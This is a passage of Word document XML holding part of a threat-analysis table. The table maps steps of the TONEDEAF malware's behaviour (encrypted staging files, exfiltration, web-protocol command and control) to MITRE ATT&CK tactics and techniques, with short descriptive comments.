        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70CCE529" w14:textId="24D9749F" w:rsidR="001A2999" w:rsidRDefault="00EB06B5" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F8052CC" w14:textId="77777777" w:rsidR="001A2999" w:rsidRPr="00B857D7" w:rsidRDefault="001A2999" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78F55484" w14:textId="1411FD12" w:rsidR="001A2999" w:rsidRDefault="001A2999" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76B84842" w14:textId="7BBFA2E1" w:rsidR="001A2999" w:rsidRDefault="00490881" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4055" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16B8F301" w14:textId="720B8523" w:rsidR="001A2999" w:rsidRDefault="001A2999" w:rsidP="00D26036">
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="00490881">
              <w:t>See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C75069" w:rsidRPr="00B857D7" w14:paraId="185145B5" w14:textId="77777777" w:rsidTr="00817791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DB15B64" w14:textId="4525CEED" w:rsidR="00C75069" w:rsidRDefault="00C75069" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="580BE564" w14:textId="6CF79E34" w:rsidR="00C75069" w:rsidRPr="008D7F76" w:rsidRDefault="00C75069" w:rsidP="00D2603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0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>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260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B6C13E7" w14:textId="1740D1BB" w:rsidR="00C75069" w:rsidRPr="008D7F76" w:rsidRDefault="00C75069" w:rsidP="00D26036">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1027 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00C75069">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Obfuscated Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C44784E" w14:textId="72D82851" w:rsidR="00C75069" w:rsidRDefault="00C75069" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49C83E0C" w14:textId="77777777" w:rsidR="00C75069" w:rsidRPr="00B857D7" w:rsidRDefault="00C75069" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="220139EA" w14:textId="100A7642" w:rsidR="00C75069" w:rsidRDefault="00C75069" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24177A89" w14:textId="64CEACB4" w:rsidR="00C75069" w:rsidRDefault="00C75069" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>AO-COL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4055" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33C499E9" w14:textId="6A995DB8" w:rsidR="00C75069" w:rsidRDefault="00C75069" w:rsidP="00D26036">
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00C75069">
              <w:t>When executed, this variant of TONEDEAF wrote encrypted data to two temporary files – temp.txt and temp2.txt – within the same directory of its execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C75069" w:rsidRPr="00B857D7" w14:paraId="3131032F" w14:textId="77777777" w:rsidTr="00817791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59AC71CC" w14:textId="7DA881DE" w:rsidR="00C75069" w:rsidRDefault="00C75069" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47968769" w14:textId="77777777" w:rsidR="00C75069" w:rsidRPr="008D7F76" w:rsidRDefault="00C75069" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE0D6D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00EE0D6D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0009 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00EE0D6D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74D59AFD" w14:textId="77777777" w:rsidR="00C75069" w:rsidRPr="008D7F76" w:rsidRDefault="00C75069" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00602963">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1074.001</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00EE0D6D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00EE0D6D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00602963">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Data Staged: Local Data Staging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41A7BF91" w14:textId="29D20C2E" w:rsidR="00C75069" w:rsidRDefault="00C75069" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B6CE7A1" w14:textId="77777777" w:rsidR="00C75069" w:rsidRPr="00B857D7" w:rsidRDefault="00C75069" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BFEF00A" w14:textId="77777777" w:rsidR="00C75069" w:rsidRDefault="00C75069" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E4BA6B1" w14:textId="77777777" w:rsidR="00C75069" w:rsidRDefault="00C75069" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>AO-COL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4055" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3746C644" w14:textId="688C8A04" w:rsidR="00C75069" w:rsidRDefault="00C75069" w:rsidP="003241F8">
            <w:r>
              <w:t>[1] See above</w:t>
            </w:r>
            <w:r w:rsidRPr="00602963">
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C75069" w:rsidRPr="0062544E" w14:paraId="4A6F3058" w14:textId="77777777" w:rsidTr="00817791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79E13098" w14:textId="7A49E5E5" w:rsidR="00C75069" w:rsidRPr="0062544E" w:rsidRDefault="00C75069" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F124116" w14:textId="77777777" w:rsidR="00C75069" w:rsidRPr="0062544E" w:rsidRDefault="00C75069" w:rsidP="003241F8">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0010 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0062544E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A57CB3A" w14:textId="77777777" w:rsidR="00C75069" w:rsidRPr="0062544E" w:rsidRDefault="00C75069" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0062544E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0062544E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1041 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0062544E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Exfiltration Over C2 Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="651C2890" w14:textId="6B4072DA" w:rsidR="00C75069" w:rsidRPr="0062544E" w:rsidRDefault="00C75069" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="044D1ADF" w14:textId="77777777" w:rsidR="00C75069" w:rsidRPr="0062544E" w:rsidRDefault="00C75069" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D0C8879" w14:textId="77777777" w:rsidR="00C75069" w:rsidRPr="0062544E" w:rsidRDefault="00C75069" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00947702">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04DC4AEC" w14:textId="77777777" w:rsidR="00C75069" w:rsidRPr="0062544E" w:rsidRDefault="00C75069" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>AO-EXF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4055" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="123305B8" w14:textId="79FB0AB4" w:rsidR="00C75069" w:rsidRPr="00DD4A99" w:rsidRDefault="00C75069" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r>
              <w:t>Exfiltrate data (staged above)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00551C36" w:rsidRPr="00B857D7" w14:paraId="204D3DD9" w14:textId="77777777" w:rsidTr="00817791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1127B7AD" w14:textId="68090633" w:rsidR="00551C36" w:rsidRDefault="00551C36" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00C75069">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BBE243E" w14:textId="77777777" w:rsidR="00551C36" w:rsidRPr="00B857D7" w:rsidRDefault="00551C36" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008D7F76">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008D7F76">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008D7F76">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08812170" w14:textId="77777777" w:rsidR="00551C36" w:rsidRPr="00B857D7" w:rsidRDefault="00551C36" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008D7F76">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1071.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008D7F76">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CEC8107" w14:textId="28FAE9EC" w:rsidR="00551C36" w:rsidRDefault="00CB71E5" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00852277">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="781EE459" w14:textId="77777777" w:rsidR="00551C36" w:rsidRPr="00B857D7" w:rsidRDefault="00551C36" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="542B1F5E" w14:textId="77777777" w:rsidR="00551C36" w:rsidRDefault="00551C36" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="155F4EDD" w14:textId="77777777" w:rsidR="00551C36" w:rsidRDefault="00551C36" w:rsidP="00D26036">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4055" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0461357A" w14:textId="000B64DB" w:rsidR="00551C36" w:rsidRDefault="00551C36" w:rsidP="00D26036">
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00551C36">
              <w:t>This value is used in subsequent requests, likely to track infected target activity</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (following above)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE29C0" w:rsidRPr="00B857D7" w14:paraId="76DF799C" w14:textId="77777777" w:rsidTr="00817791">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02491E3E" w14:textId="1ADBEEBB" w:rsidR="00EE29C0" w:rsidRDefault="00CB71E5" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00C75069">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A19EECA" w14:textId="4534F61E" w:rsidR="00EE29C0" w:rsidRPr="00B857D7" w:rsidRDefault="00CB71E5" w:rsidP="002F6F9E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008D7F76">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008D7F76">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008D7F76">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command and Control</w:t>
